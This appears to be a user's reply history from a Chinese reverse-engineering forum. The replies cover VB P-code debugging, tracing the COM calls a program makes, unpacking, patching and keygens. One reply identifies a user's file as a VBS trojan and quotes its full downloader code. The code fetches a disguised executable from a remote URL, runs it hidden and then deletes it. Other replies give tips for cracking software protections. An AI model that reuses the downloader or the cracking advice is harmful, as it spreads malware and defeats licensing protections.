|
[求助]如何找出VB编译的程序用到了哪些OCX控件?
正常情况下,第一个参数是个指针,指向一个GUID结构。 关于GUID的定义,相关头文件中是这样定义的: typedef struct _GUID { DWORD Data1; WORD Data2; WORD Data3; BYTE Data4[8]; } GUID; 我没用过VB,我只知道在VC中一般是通过(直接或通过MFC间接地)调用底层的CoCreateInstance()或CoCreateInstanceEx()API来获取要调用的组件的接口的。 但我猜测VB也应该是这么实现的。 |
|
[求助]是否需要跟踪MSVBVM60.XXXXXXXX
vb分P-CODE和N-CODE,P-CODE其实就是虚拟机执行,如果刚入门,只会386汇编,那就不要拿VB的P-CODE来练习了,不会有效果的,只会让你头晕。 如果对虚拟机等有一定的理解,可以试着跟一跟,不过不推荐用OD,最好用P-CODE专门的调试器——WDK VBDebugger |
|
[求助]是否需要跟踪MSVBVM60.XXXXXXXX
vb分P-CODE和N-CODE,P-CODE其实就是虚拟机执行,如果刚入门,只会386汇编,那就不要拿VB的P-CODE来练习了,不会有效果的,只会让你头晕。 如果对虚拟机等有一定的理解,可以试着跟一跟,不过不推荐用OD,最好用P-CODE专门的调试器——WDK VBDebugger |
|
|
|
[求助]如何找出VB编译的程序用到了哪些OCX控件?
你查一下CoCreateInstanceEx函数的参数说明。 第一个参数是CLSID的引用。 CLSID是一个结构体,一般C++编译器引用是通过指针或类似的方式实现的。 |
|
运行个老在系统修改的vbs!![求助]
恭喜你,中标了:Trojan.DL.VBS.Agent.ai On Error Resume Next:Set o0C0o = Wscript.CreateObject("Scripting.FileSystemObject"):Set o0x0o = CreateObject("Msxml2.XMLHTTP"):Set o0m0o = CreateObject("Wscript.Shell"):o0x0o.Open "GET","http://i.namipan.com/files/46190b63d82b8d79d0a21792a0b608edc9aed4c10090190057e2/0/360.jpg",0:o0x0o.Send():Set o00o = CreateObject("ADODB.Stream"):o00o.Mode = 3:o00o.Type = 1:o00o.Open():o00o.Write(o0x0o.responseBody):o00o.SaveToFile "C:\pagefile.exe",2:wscript.sleep 10000:o0m0o.Run ("C:\pagefile.exe"),0:wscript.sleep 10000:o0c0o.DeleteFile("C:\pagefile.exe"),0 |
|
[求助]如何找出VB编译的程序用到了哪些OCX控件?
我说错了,应该是CoCreateInstance()或者CoCreateInstanceEx()函数。 使用COM组件一般是用这两个函数之一来创建一个组件对象并返回它的接口的。 在函数下断点,从堆栈中找到组件的CLSID,然后就可以查到组件是哪个文件中实现的了。 |
|
[求助]如何找出VB编译的程序用到了哪些OCX控件?
做过COM编程的应该知道呀,下断点QueryInterface试试。 |
|
帮忙看看这段代码做了什么?
VB的东西是又臭又长,没人愿意去读,试试VB Decompiler吧,它处理过的代码稍微好读一些。 |
|
[求助]求助大牛帮我看看这个是个什么算法啊?
1.上面那段循环,我只是大体看了一下,至于为什么出错,你用调试器跟进去一下,每循环一次,与原来的程序进行比较一次,看看是哪里出错了。 2.那个表,既然是常数,等程序将初始化后,直接从内存DUMP出来即可。 |
|
[求助]程序容易被爆破的原因是什么?
在外层用SEH,拿我给出的例子来说,函数表中有用的函数在其中的分布是非常散的,它们之前的间隙,可以用一些占位函数(如DoNothing)填充,也可以用无效的值(比如NULL)来填充。 如果填充的值当中有无效的函数指针,那么在调用时肯定会引发异常。为此,加上SEH。 |
|
[讨论]写注册机,C++与Keymake你选哪一个?
这有什么好说的,会编程的,拿自己拿手的工具就行了。 MASM32,VC,BCB,DELPHI,VB,易语言,甚至ASP、JSP都可以,既然你的算法都清楚了。 自己用什么顺手就用什么,没有哪个开发工具就比另一个好。 用keymake的好处是只需要关心算法实现部分,不用管界面和框架,不过keymake的汇编器似乎还有BUG存在,反正我是没用过。 |
|
[求助]运行脱壳后的程序后关机
贴的代码看不出什么来。 如果是爆破后出现此情况,一般都是因为程序还有其它校验,相当于爆破不完全。 试试下断点ExitWindowEx函数。如果断下来了,堆栈展开,往上翻翻,找一下在哪里进行的判断。 |
|
[求助]有关鼠标钩子的一个问题
既然找到了获取按键信息的地方,那剩下的就简单了呀,patch代码,或patch数据都可以的。 |
|
[求助]内存补丁
那就试试在解码的位置让程序停下来,读取寄存器找到被解码代码的地址,然后再用偏移量换算出需要patch的地址。 |
|
[求助]怎么在OD里查看堆内存呢?
函数返回后,EAX中即是分配的地址,直接d eax即可。 |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值